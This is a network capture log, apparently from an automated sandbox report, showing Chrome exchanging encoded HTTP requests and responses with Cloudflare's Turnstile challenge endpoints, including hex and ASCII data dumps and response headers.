                                                                                                                          2024-11-25 15:42:44 UTC16384OUTData Raw: 76 5f 38 65 38 32 62 66 63 66 31 61 62 39 34 33 36 33 3d 38 2d 36 25 32 62 69 65 6c 33 6d 6c 36 65 2d 48 57 37 73 37 79 37 4b 68 50 6c 54 37 6b 2b 6a 2b 48 50 6c 52 57 37 38 64 36 65 43 6c 47 47 37 50 67 64 66 50 62 65 6c 35 37 4e 4e 68 2d 34 4e 37 59 50 6f 44 5a 4e 6c 53 48 55 65 65 6d 6c 6b 37 57 30 4f 4e 6f 2b 66 62 6c 6e 37 5a 36 50 37 6b 51 63 63 50 37 68 2b 6c 43 37 4d 44 64 37 33 6f 37 57 4a 73 37 42 66 64 4b 7a 37 57 64 6c 48 37 74 78 33 6c 4d 57 54 64 65 55 57 65 62 71 63 2d 6d 6d 46 36 37 24 53 65 30 50 58 36 37 31 42 4b 59 43 2b 65 4d 4f 58 36 55 34 36 73 4a 37 65 52 67 33 4e 63 51 54 35 50 67 24 42 65 7a 6f 2b 2b 2d 69 35 73 30 37 6c 73 7a 37 37 2d 37 79 79 50 55 31 76 59 24 6f 79 36 68 41 50 6f 63 77 4e 65 59 6e 76 6f 55 76 6f 78 39 52 76 5a
                                                                                                                          Data Ascii: v_8e82bfcf1ab94363=8-6%2biel3ml6e-HW7s7y7KhPlT7k+j+HPlRW78d6eClGG7PgdfPbel57NNh-4N7YPoDZNlSHUeemlk7W0ONo+fbln7Z6P7kQccP7h+lC7MDd73o7WJs7BfdKz7WdlH7tx3lMWTdeUWebqc-mmF67$Se0PX671BKYC+eMOX6U46sJ7eRg3NcQT5Pg$Bezo++-i5s07lsz77-7yyPU1vY$oy6hAPocwNeYnvoUvox9RvZ
                                                                                                                          2024-11-25 15:42:44 UTC15465OUTData Raw: 67 58 65 50 4e 75 47 52 6e 6c 78 34 4b 32 55 6c 7a 57 51 37 45 58 7a 56 37 41 59 52 6c 38 36 46 50 50 41 4a 33 64 36 66 78 50 2b 39 6f 50 33 42 46 6c 66 37 50 74 6c 57 37 78 4e 37 37 68 4f 56 37 76 4e 65 30 6c 6e 73 6f 2b 65 4a 6c 4e 37 46 4e 37 4f 6c 39 51 51 78 65 56 67 68 50 65 4e 4b 2b 65 50 37 4a 78 37 65 37 67 77 67 37 68 4e 6c 67 37 52 37 50 47 6c 31 37 4d 2b 37 6d 37 48 39 4d 2b 66 61 37 62 37 47 6d 45 36 37 48 37 74 64 68 6d 37 56 38 5a 2b 50 4c 79 6c 37 50 4e 50 64 6c 51 37 47 30 65 6f 6c 45 37 51 78 6c 37 37 39 37 47 4e 50 57 6c 71 64 33 56 69 49 37 52 37 6c 64 48 33 37 63 64 6f 64 4b 2d 37 36 2b 41 62 65 61 6c 48 2d 6f 2b 65 6a 6c 33 59 65 4e 4b 39 77 30 64 66 62 37 62 37 30 36 6f 24 6c 33 37 4f 37 38 64 4b 2d 37 4d 37 6f 64 37 43 37 33 37 37
                                                                                                                          Data Ascii: gXePNuGRnlx4K2UlzWQ7EXzV7AYRl86FPPAJ3d6fxP+9oP3BFlf7PtlW7xN77hOV7vNe0lnso+eJlN7FN7Ol9QQxeVghPeNK+eP7Jx7e7gwg7hNlg7R7PGl17M+7m7H9M+fa7b7GmE67H7tdhm7V8Z+PLyl7PNPdlQ7G0eolE7Qxl7797GNPWlqd3ViI7R7ldH37cdodK-76+AbealH-o+ejl3YeNK9w0dfb7b706o$l37O78dK-7M7od7C7377
                                                                                                                          2024-11-25 15:42:44 UTC330INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:42:44 GMT
                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                          Content-Length: 26328
                                                                                                                          Connection: close
                                                                                                                          cf-chl-gen: mxjihAAo+nSEjjl9OxtVdxUc9O/0c+ciKNb/dqbINVRAIiqoFZj0+/JmL/z04JZtQ5HZQ3kMBH7rcyKm$URUZ39VlrsLaGp6T
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e82c0177da68c75-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-11-25 15:42:44 UTC1039INData Raw: 52 55 69 48 56 49 68 2b 53 31 68 71 6b 30 74 69 61 4a 4e 69 6a 47 68 76 68 70 52 2b 6b 6e 53 59 67 70 56 62 68 59 32 5a 6e 6f 57 46 69 71 71 4a 6e 6e 75 6c 66 6d 79 65 6f 49 69 31 64 6f 65 69 68 6f 36 35 72 71 2b 65 74 35 36 33 6b 72 4f 63 74 59 4f 55 73 70 57 4a 79 61 33 43 6e 35 36 61 79 4d 36 6f 76 71 48 51 31 63 44 51 72 4e 76 52 7a 72 43 64 31 4d 43 72 73 72 69 7a 74 39 4f 36 32 38 76 71 31 72 6e 43 37 64 6a 70 36 63 6e 54 35 65 7a 77 35 74 6a 43 73 64 44 4f 39 75 66 59 39 2b 7a 52 32 50 58 58 30 64 6f 41 33 4e 6a 32 32 50 67 4f 38 41 72 4e 44 4f 30 49 36 4e 63 49 35 66 50 6b 47 52 54 72 39 78 76 72 37 4f 7a 57 41 52 6e 6e 4a 41 66 30 4a 53 63 48 4b 41 49 6f 4b 69 77 67 36 79 34 66 42 6a 51 7a 44 78 33 37 4c 78 45 78 43 76 73 39 41 68 77 46 48 54 6f
                                                                                                                          Data Ascii: RUiHVIh+S1hqk0tiaJNijGhvhpR+knSYgpVbhY2ZnoWFiqqJnnulfmyeoIi1doeiho65rq+et563krOctYOUspWJya3Cn56ayM6ovqHQ1cDQrNvRzrCd1MCrsrizt9O628vq1rnC7djp6cnT5ezw5tjCsdDO9ufY9+zR2PXX0doA3Nj22PgO8ArNDO0I6NcI5fPkGRTr9xvr7OzWARnnJAf0JScHKAIoKiwg6y4fBjQzDx37LxExCvs9AhwFHTo
                                                                                                                          2024-11-25 15:42:44 UTC1369INData Raw: 33 55 6f 56 31 68 46 65 49 6b 34 31 59 6f 48 74 36 65 33 4e 67 6e 4a 39 6d 64 4a 71 5a 66 61 31 2b 6d 57 75 41 6e 33 78 75 68 59 42 76 75 59 61 44 72 72 32 4b 69 72 4c 42 6a 6f 32 54 70 4b 58 44 68 59 53 59 76 71 6d 6b 6d 36 61 50 72 4b 66 48 77 34 37 4d 7a 63 32 56 75 62 4f 7a 33 72 66 59 72 5a 79 61 73 72 79 32 34 64 48 59 77 38 4b 68 76 38 6a 48 7a 4b 69 2f 77 71 2f 64 38 63 2b 32 36 63 58 6c 2b 4f 62 65 30 73 72 67 36 39 50 75 37 2f 48 45 41 66 62 78 35 2b 66 4c 36 63 51 50 35 4e 44 6c 38 73 30 4e 43 41 58 51 2b 75 4c 52 38 65 7a 6f 31 52 7a 68 38 66 48 37 45 53 4d 42 34 78 59 57 4c 51 76 31 48 50 63 4e 4d 77 48 38 49 51 73 4c 4f 43 63 57 42 41 73 64 4b 44 35 41 4c 45 49 4e 47 42 64 43 47 79 68 46 45 6a 55 62 4c 54 6b 48 43 6b 64 4b 42 53 42 45 4e 68
                                                                                                                          Data Ascii: 3UoV1hFeIk41YoHt6e3NgnJ9mdJqZfa1+mWuAn3xuhYBvuYaDrr2KirLBjo2TpKXDhYSYvqmkm6aPrKfHw47Mzc2VubOz3rfYrZyasry24dHYw8Khv8jHzKi/wq/d8c+26cXl+Obe0srg69Pu7/HEAfbx5+fL6cQP5NDl8s0NCAXQ+uLR8ezo1Rzh8fH7ESMB4xYWLQv1HPcNMwH8IQsLOCcWBAsdKD5ALEINGBdCGyhFEjUbLTkHCkdKBSBENh
                                                                                                                          2024-11-25 15:42:44 UTC1369INData Raw: 65 6e 64 78 6f 59 78 31 64 61 56 6d 6c 33 53 47 63 34 71 63 68 61 36 76 71 37 46 38 68 34 79 78 69 70 65 31 70 36 53 44 73 59 71 2b 6b 6f 2b 4b 76 4c 4b 55 6a 58 32 45 6d 49 6d 6a 76 4b 48 42 77 38 4c 42 69 39 4b 6e 7a 4b 6d 69 74 49 37 4d 30 73 4f 36 75 72 4c 4a 76 64 33 55 6d 72 6a 5a 7a 72 75 7a 34 4d 48 48 76 38 50 73 70 65 6a 46 32 76 50 68 35 37 4c 4f 34 73 62 53 39 62 72 49 74 4d 63 41 76 76 57 31 33 2f 66 47 78 75 58 54 44 41 62 69 42 67 4d 4b 43 63 2f 63 35 67 30 4c 30 75 33 7a 30 39 4c 33 37 2f 4d 65 36 78 77 61 47 78 73 6a 39 78 63 68 47 65 59 69 33 51 67 67 37 6a 41 4f 2b 7a 51 75 43 78 38 43 42 7a 6a 32 4e 41 73 71 4d 50 6f 58 4b 2f 6f 31 4f 42 73 6c 52 41 4d 6f 53 68 4e 42 43 45 45 4a 43 69 46 4b 42 53 42 45 44 45 35 45 4a 30 5a 45 47 44 63
                                                                                                                          Data Ascii: endxoYx1daVml3SGc4qcha6vq7F8h4yxipe1p6SDsYq+ko+KvLKUjX2EmImjvKHBw8LBi9KnzKmitI7M0sO6urLJvd3UmrjZzruz4MHHv8PspejF2vPh57LO4sbS9brItMcAvvW13/fGxuXTDAbiBgMKCc/c5g0L0u3z09L37/Me6xwaGxsj9xchGeYi3Qgg7jAO+zQuCx8CBzj2NAsqMPoXK/o1OBslRAMoShNBCEEJCiFKBSBEDE5EJ0ZEGDc
                                                                                                                          2024-11-25 15:42:44 UTC1369INData Raw: 6f 32 44 67 32 65 46 59 4b 71 41 61 48 64 6c 6d 71 4a 38 61 61 2b 69 67 47 32 7a 6b 49 52 78 74 33 4f 49 64 62 75 2b 6a 48 6e 41 73 70 42 39 78 4a 36 5a 6c 71 4f 6e 76 34 71 4a 70 70 7a 4e 6b 4e 48 45 6f 4d 32 6a 78 36 2b 71 30 39 4b 33 30 4a 32 30 30 74 58 43 35 4c 72 70 73 38 6a 61 33 72 2f 61 76 2b 48 42 37 73 2f 71 31 73 44 73 38 73 76 70 79 64 50 52 74 39 33 34 38 2f 76 43 74 67 62 42 2b 4d 6a 44 41 4f 72 6b 31 65 7a 6b 41 38 6f 47 35 74 44 48 7a 67 50 51 32 42 50 38 2f 65 6f 67 47 74 62 72 2b 64 30 52 45 52 67 49 47 79 59 66 33 66 6e 38 47 69 34 5a 43 50 45 45 43 51 73 32 38 52 41 37 43 69 6b 37 39 67 30 38 39 30 49 50 44 54 64 47 45 78 41 37 53 68 63 58 50 30 34 62 47 69 41 78 4d 6c 41 53 45 53 56 4c 4e 6a 45 6f 4d 78 77 35 4d 79 42 52 48 30 78 57
                                                                                                                          Data Ascii: o2Dg2eFYKqAaHdlmqJ8aa+igG2zkIRxt3OIdbu+jHnAspB9xJ6ZlqOnv4qJppzNkNHEoM2jx6+q09K30J200tXC5Lrps8ja3r/av+HB7s/q1sDs8svpydPRt9348/vCtgbB+MjDAOrk1ezkA8oG5tDHzgPQ2BP8/eogGtbr+d0RERgIGyYf3fn8Gi4ZCPEECQs28RA7Cik79g0890IPDTdGExA7ShcXP04bGiAxMlASESVLNjEoMxw5MyBRH0xW
                                                                                                                          2024-11-25 15:42:44 UTC1369INData Raw: 36 66 72 4a 61 76 72 6f 4b 44 6e 61 57 4e 71 71 4f 51 71 58 42 34 64 49 6d 52 75 5a 6d 41 6f 4d 48 44 67 35 79 2f 78 34 61 36 67 73 53 4c 74 73 32 38 69 62 2b 6f 76 73 75 67 73 4c 65 70 6d 63 53 71 7a 4c 47 37 75 74 4c 57 72 36 43 76 6f 74 33 58 30 75 4c 48 78 4f 6e 73 72 2b 7a 4c 72 37 33 64 73 2b 2f 72 2b 4d 2f 57 36 4e 48 52 33 2f 6e 39 33 50 59 41 37 64 4f 34 75 66 76 54 41 41 59 4b 32 4d 66 67 42 4d 33 63 43 42 51 50 37 4e 45 4f 31 42 44 6f 46 68 66 58 39 42 72 79 37 50 77 62 45 41 55 58 47 79 51 46 49 52 37 73 47 79 77 69 45 69 63 53 4c 79 34 42 44 54 59 4e 45 67 59 77 4e 78 59 49 50 78 49 41 4e 55 41 44 52 78 68 44 4b 67 45 5a 53 45 59 68 4b 30 67 36 51 30 4e 4b 4b 69 6b 50 53 68 56 54 54 55 38 75 57 31 35 61 57 69 30 35 59 69 49 39 4f 57 4a 4b 48
                                                                                                                          Data Ascii: 6frJavroKDnaWNqqOQqXB4dImRuZmAoMHDg5y/x4a6gsSLts28ib+ovsugsLepmcSqzLG7utLWr6Cvot3X0uLHxOnsr+zLr73ds+/r+M/W6NHR3/n93PYA7dO4ufvTAAYK2MfgBM3cCBQP7NEO1BDoFhfX9Bry7PwbEAUXGyQFIR7sGywiEicSLy4BDTYNEgYwNxYIPxIANUADRxhDKgEZSEYhK0g6Q0NKKikPShVTTU8uW15aWi05YiI9OWJKH
                                                                                                                          2024-11-25 15:42:44 UTC1369INData Raw: 70 66 70 32 71 70 4b 75 51 6c 61 53 31 6a 72 36 50 75 4a 52 34 72 4c 75 57 6a 71 62 43 6e 5a 57 30 71 5a 36 2b 6d 73 32 35 72 49 72 4e 77 59 36 50 6f 38 65 55 71 35 65 7a 76 4c 50 67 7a 35 7a 41 72 4e 48 45 34 4b 66 55 32 37 2f 6e 32 4c 66 50 75 4d 6e 78 38 4f 7a 49 36 66 44 34 30 66 6e 77 38 63 6e 74 74 62 62 5a 41 65 4c 37 32 4f 44 50 41 39 2f 6f 42 73 6e 36 44 77 50 62 2f 65 48 39 44 51 51 4c 46 68 49 47 30 74 4c 6d 42 68 4d 4e 46 50 6a 39 44 52 37 32 4a 2f 63 68 2f 4f 41 56 4a 50 37 32 44 79 73 47 2f 52 30 53 42 79 63 44 4e 69 49 56 38 76 6b 70 2b 42 6b 50 46 79 49 76 45 7a 4d 6b 52 6a 38 68 41 77 63 48 48 6b 41 63 48 79 51 63 54 56 51 39 56 79 77 6e 4b 30 70 4a 4f 6a 41 35 4f 43 38 75 55 6c 6c 6a 4f 54 51 65 4b 46 55 6b 5a 7a 64 58 4b 55 55 2b 52 31
                                                                                                                          Data Ascii: pfp2qpKuQlaS1jr6PuJR4rLuWjqbCnZW0qZ6+ms25rIrNwY6Po8eUq5ezvLPgz5zArNHE4KfU27/n2LfPuMnx8OzI6fD40fnw8cnttbbZAeL72ODPA9/oBsn6DwPb/eH9DQQLFhIG0tLmBhMNFPj9DR72J/ch/OAVJP72DysG/R0SBycDNiIV8vkp+BkPFyIvEzMkRj8hAwcHHkAcHyQcTVQ9VywnK0pJOjA5OC8uUlljOTQeKFUkZzdXKUU+R1
                                                                                                                          2024-11-25 15:42:44 UTC1369INData Raw: 72 72 71 47 71 34 78 33 6a 71 39 37 77 6f 2b 73 70 61 43 53 74 5a 6d 55 6c 37 6d 74 74 70 6d 2f 73 61 2f 4b 77 36 54 56 6c 38 61 55 73 4b 62 4c 72 62 79 6e 7a 36 2f 57 73 74 4f 31 75 4c 48 58 79 64 61 32 32 2b 4f 34 76 4e 6a 52 33 72 7a 69 78 63 75 32 35 73 6e 51 79 4f 76 7a 7a 2f 62 76 76 4e 54 52 38 2b 58 54 78 2f 62 59 43 39 72 37 32 77 50 65 2f 66 48 2b 34 41 51 4d 39 4f 59 48 2b 66 54 6e 42 66 30 48 37 67 2f 77 49 2b 30 55 48 41 54 6e 47 41 6f 49 49 78 77 6b 46 2f 67 66 41 67 58 2b 49 78 59 4a 41 69 67 49 4c 77 6f 72 44 68 6b 4c 4d 43 49 5a 44 44 49 6d 49 52 49 78 4b 6a 4d 58 50 43 34 74 48 6a 38 69 50 68 52 45 4e 69 52 50 52 7a 6f 34 47 30 73 2b 4b 53 70 51 4d 57 4d 78 55 6a 52 62 4e 31 64 67 4e 54 56 63 4b 56 63 2b 58 31 4a 41 61 32 4e 57 58 30 56
                                                                                                                          Data Ascii: rrqGq4x3jq97wo+spaCStZmUl7mttpm/sa/Kw6TVl8aUsKbLrbynz6/WstO1uLHXyda22+O4vNjR3rzixcu25snQyOvzz/bvvNTR8+XTx/bYC9r72wPe/fH+4AQM9OYH+fTnBf0H7g/wI+0UHATnGAoIIxwkF/gfAgX+IxYJAigILworDhkLMCIZDDImIRIxKjMXPC4tHj8iPhRENiRPRzo4G0s+KSpQMWMxUjRbN1dgNTVcKVc+X1JAa2NWX0V
                                                                                                                          2024-11-25 15:42:44 UTC1369INData Raw: 4b 6d 50 74 4b 4b 54 74 4a 71 6e 73 5a 65 38 70 4a 75 38 6f 71 2b 35 6e 38 53 6d 77 4a 36 6e 7a 71 4b 54 79 61 6e 46 74 64 6e 57 7a 35 72 67 7a 4c 33 5a 6e 62 72 51 79 63 53 35 31 62 62 70 76 64 6e 4a 37 65 72 6a 73 4f 48 78 34 4e 50 58 74 74 57 32 74 64 4c 6f 32 62 6f 46 7a 38 34 43 41 39 50 59 33 75 58 61 44 4d 59 52 33 41 59 53 44 76 7a 74 45 74 4c 69 35 77 33 72 43 65 55 53 46 2b 6f 42 45 66 6b 4e 2f 65 4c 69 41 75 4c 68 41 78 55 47 4a 69 6f 5a 43 76 4c 75 41 41 51 70 44 43 55 43 38 6a 4d 49 48 53 30 61 4b 52 73 55 2f 68 37 2b 2f 52 6f 78 4a 43 68 47 49 78 63 76 50 45 41 72 51 67 38 75 44 77 34 79 51 54 4d 37 53 45 77 33 54 6c 70 4a 4f 30 4e 51 56 43 39 57 49 30 49 6a 49 6b 46 56 52 30 39 63 59 44 74 69 62 6c 31 50 56 32 52 6f 65 57 6f 33 56 6a 63 32
                                                                                                                          Data Ascii: KmPtKKTtJqnsZe8pJu8oq+5n8SmwJ6nzqKTyanFtdnWz5rgzL3ZnbrQycS51bbpvdnJ7erjsOHx4NPXttW2tdLo2boFz84CA9PY3uXaDMYR3AYSDvztEtLi5w3rCeUSF+oBEfkN/eLiAuLhAxUGJioZCvLuAAQpDCUC8jMIHS0aKRsU/h7+/RoxJChGIxcvPEArQg8uDw4yQTM7SEw3TlpJO0NQVC9WI0IjIkFVR09cYDtibl1PV2RoeWo3Vjc2


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          25192.168.2.449774104.18.95.414434944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:46 UTC596OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/8483636:1732548334:qatzfLsdWnn2uID_O6ulEbg-8PKAVWoVLs9erdHCWOA/8e82bfcf1ab94363/hwCBjRMZRBug6QUHIo8pkoJHB0bg199dhoOmFBOknk4-1732549352-1.1.1.1-W02dE4SJg1LEqxYn._MVvE_JDplRpnbMbGpKdagnp3aiY4qmIMS7S1mKMY.sC0_n HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-11-25 15:42:47 UTC379INHTTP/1.1 404 Not Found
                                                                                                                          Date: Mon, 25 Nov 2024 15:42:46 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Content-Length: 7
                                                                                                                          Connection: close
                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                          cf-chl-out: WxH2Onf9w2fvynxFq+WQxZOQqlsgEs4woZA=$TkiKL64LfXydYDNI
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e82c026ab93428b-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-11-25 15:42:47 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                          Data Ascii: invalid


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          26192.168.2.449775104.18.94.414434944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:55 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/8483636:1732548334:qatzfLsdWnn2uID_O6ulEbg-8PKAVWoVLs9erdHCWOA/8e82bfcf1ab94363/hwCBjRMZRBug6QUHIo8pkoJHB0bg199dhoOmFBOknk4-1732549352-1.1.1.1-W02dE4SJg1LEqxYn._MVvE_JDplRpnbMbGpKdagnp3aiY4qmIMS7S1mKMY.sC0_n HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 34336
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                                                          CF-Chl-RetryAttempt: 0
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          CF-Challenge: hwCBjRMZRBug6QUHIo8pkoJHB0bg199dhoOmFBOknk4-1732549352-1.1.1.1-W02dE4SJg1LEqxYn._MVvE_JDplRpnbMbGpKdagnp3aiY4qmIMS7S1mKMY.sC0_n
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Origin: https://challenges.cloudflare.com
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qgqz3/0x4AAAAAAAz5HcczQ_Y58zGl/auto/fbE/normal/auto/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-11-25 15:42:55 UTC16384OUTData Raw: 76 5f 38 65 38 32 62 66 63 66 31 61 62 39 34 33 36 33 3d 38 2d 36 25 32 62 69 65 6c 33 6d 6c 36 65 2d 48 57 37 73 37 79 37 4b 68 50 6c 54 37 6b 2b 6a 2b 48 50 6c 52 57 37 38 64 36 65 43 6c 47 47 37 50 67 64 66 50 62 65 6c 35 37 4e 4e 68 2d 34 4e 37 59 50 6f 44 5a 4e 6c 53 48 55 65 65 6d 6c 6b 37 57 30 4f 4e 6f 2b 66 62 6c 6e 37 5a 36 50 37 6b 51 63 63 50 37 68 2b 6c 43 37 4d 44 64 37 33 6f 37 57 4a 73 37 42 66 64 4b 7a 37 57 64 6c 48 37 74 78 33 6c 4d 57 54 64 65 55 57 65 62 71 63 2d 6d 6d 46 36 37 24 53 65 30 50 58 36 37 31 42 4b 59 43 2b 65 4d 4f 58 36 55 34 36 73 4a 37 65 52 67 33 4e 63 51 54 35 50 67 24 42 65 7a 6f 2b 2b 2d 69 35 73 30 37 6c 73 7a 37 37 2d 37 79 79 50 55 31 76 59 24 6f 79 36 68 41 50 6f 63 77 4e 65 59 6e 76 6f 55 76 6f 78 39 52 76 5a
                                                                                                                          Data Ascii: v_8e82bfcf1ab94363=8-6%2biel3ml6e-HW7s7y7KhPlT7k+j+HPlRW78d6eClGG7PgdfPbel57NNh-4N7YPoDZNlSHUeemlk7W0ONo+fbln7Z6P7kQccP7h+lC7MDd73o7WJs7BfdKz7WdlH7tx3lMWTdeUWebqc-mmF67$Se0PX671BKYC+eMOX6U46sJ7eRg3NcQT5Pg$Bezo++-i5s07lsz77-7yyPU1vY$oy6hAPocwNeYnvoUvox9RvZ
                                                                                                                          2024-11-25 15:42:55 UTC16384OUTData Raw: 67 58 65 50 4e 75 47 52 6e 6c 78 34 4b 32 55 6c 7a 57 51 37 45 58 7a 56 37 41 59 52 6c 38 36 46 50 50 41 4a 33 64 36 66 78 50 2b 39 6f 50 33 42 46 6c 66 37 50 74 6c 57 37 78 4e 37 37 68 4f 56 37 76 4e 65 30 6c 6e 73 6f 2b 65 4a 6c 4e 37 46 4e 37 4f 6c 39 51 51 78 65 56 67 68 50 65 4e 4b 2b 65 50 37 4a 78 37 65 37 67 77 67 37 68 4e 6c 67 37 52 37 50 47 6c 31 37 4d 2b 37 6d 37 48 39 4d 2b 66 61 37 62 37 47 6d 45 36 37 48 37 74 64 68 6d 37 56 38 5a 2b 50 4c 79 6c 37 50 4e 50 64 6c 51 37 47 30 65 6f 6c 45 37 51 78 6c 37 37 39 37 47 4e 50 57 6c 71 64 33 56 69 49 37 52 37 6c 64 48 33 37 63 64 6f 64 4b 2d 37 36 2b 41 62 65 61 6c 48 2d 6f 2b 65 6a 6c 33 59 65 4e 4b 39 77 30 64 66 62 37 62 37 30 36 6f 24 6c 33 37 4f 37 38 64 4b 2d 37 4d 37 6f 64 37 43 37 33 37 37
                                                                                                                          Data Ascii: gXePNuGRnlx4K2UlzWQ7EXzV7AYRl86FPPAJ3d6fxP+9oP3BFlf7PtlW7xN77hOV7vNe0lnso+eJlN7FN7Ol9QQxeVghPeNK+eP7Jx7e7gwg7hNlg7R7PGl17M+7m7H9M+fa7b7GmE67H7tdhm7V8Z+PLyl7PNPdlQ7G0eolE7Qxl7797GNPWlqd3ViI7R7ldH37cdodK-76+AbealH-o+ejl3YeNK9w0dfb7b706o$l37O78dK-7M7od7C7377
                                                                                                                          2024-11-25 15:42:55 UTC1568OUTData Raw: 77 6d 4e 6c 7a 67 63 57 4f 37 24 76 50 5a 76 58 59 34 5a 37 66 56 38 5a 67 4b 4e 73 4e 66 63 4b 52 30 43 4f 61 7a 50 64 37 6c 62 66 24 6c 30 24 6e 68 65 73 64 4c 64 53 2b 4b 64 6c 6a 2d 62 4d 39 57 6c 77 4e 48 34 6d 35 55 4c 64 4c 2b 57 4c 69 55 37 4d 2d 50 73 48 5a 37 46 79 59 71 6b 75 37 4e 4f 66 46 63 6b 37 77 61 48 49 4d 50 73 4c 56 4d 67 48 36 2d 45 54 38 4c 79 30 64 57 47 74 64 2b 43 4e 42 51 6d 6b 58 38 2b 24 44 66 57 70 55 38 61 62 73 6d 37 43 37 62 48 52 37 6c 2b 75 7a 51 6a 70 37 66 63 61 34 4a 69 52 6a 30 5a 61 2d 43 35 42 4a 53 4e 50 63 4e 66 34 63 67 24 73 49 46 61 24 6f 65 4e 5a 5a 2b 4d 39 58 78 6c 5a 6c 54 44 57 59 6c 4a 43 4f 6a 70 74 6b 74 4c 75 51 37 68 44 45 44 6e 64 68 6f 52 55 37 5a 38 6c 47 73 4b 44 35 6c 34 69 2b 30 2d 51 6d 71 6d
                                                                                                                          Data Ascii: wmNlzgcWO7$vPZvXY4Z7fV8ZgKNsNfcKR0COazPd7lbf$l0$nhesdLdS+Kdlj-bM9WlwNH4m5ULdL+WLiU7M-PsHZ7FyYqku7NOfFck7waHIMPsLVMgH6-ET8Ly0dWGtd+CNBQmkX8+$DfWpU8absm7C7bHR7l+uzQjp7fca4JiRj0Za-C5BJSNPcNf4cg$sIFa$oeNZZ+M9XxlZlTDWYlJCOjptktLuQ7hDEDndhoRU7Z8lGsKD5l4i+0-Qmqm
                                                                                                                          2024-11-25 15:42:55 UTC1312INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:42:55 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4480
                                                                                                                          Connection: close
                                                                                                                          cf-chl-out-s: nck+cDvU36wRQUnU5jPGtleRB1+p2fX3Fz7iL86uwN6y2WbrwulWSEYZ/VdNzGWvI/RE7Ef0XSlwl5S7vXrf1nk5pCHwDsIZOPvXKhRDKjaJajMwJxuFofd8IzrUw2iJkqRccFRqpiflhc9nBmX5mYtgogUxh4B++cWdFPMHufmcSLSehGoZ9bvp9nfxnx1ZMvsb4g4a/eGxb8yhbLDWZSwSnqBdrnKrrk3+jvS8ZrNEE3Cuw2xNEqCKpvDw26Ee3jzIifkpq73D3uVNUhbRYOaK+dq9/kuZ6BCpsbeEpCKqA9vZQXCL74WqPYsZuOsSSCvXHmelCANhG+vCIRX8z3z9gBo6SLVIgliryEZv/+TcO413rKgwMsmVmHVeq1++WLA47TQBt/EJJ7RL+U7jwlOIm1j2Q/EdlM360TB02f1LEBpn9N6s3IIWjRTUUh8mmC241DjMD8hcIRzHgAoaPAnV0exIML8dlRHD/HwlQMenOAACzwTAPN6b8MldKuZIAAJmaJnMMTJ45UFaPnS5yk3I2LZ3ouocDAj1erAhdEGQVdWoQTV9qAgSw8adRs+CCRAAskObcnXVDXtrgqnhDQ5En+Syh/ylvNK5kBLwd/r/OIXEOKoGj9KLPtzO6WOfVII7Nj+IO76dy/DB+I5LM8744oImKJzDufBQbQZBAPw0N3ypJwT6iaY9dnrnDeOPj17YkksFBPdomck23UCzLEesQeQgaFoEndDhjLqTEHgKPGpJHT3pOKv9W3GnslMaUuWm4HEKsSwnZe5tsnHyjBQRSfDpO686r7UNe+FUmbnzisx8aXYxHG8Q4CeEj9228126fdORn7sSinsDeiSAmuMdTyCd5+am82V7k2Jpnxb277louxzbRSK8uBxQjDdBbYMjk+rk4fHWg35xuBR50G+Vc//AcQ6RTXAITgZNPrudsdNmoKqaCinnx2fCE32a01mq9R1B2DH8wPUSucp7F1HMh5TmDXI27RAX6GPfYI6YwzZPqS [TRUNCATED]
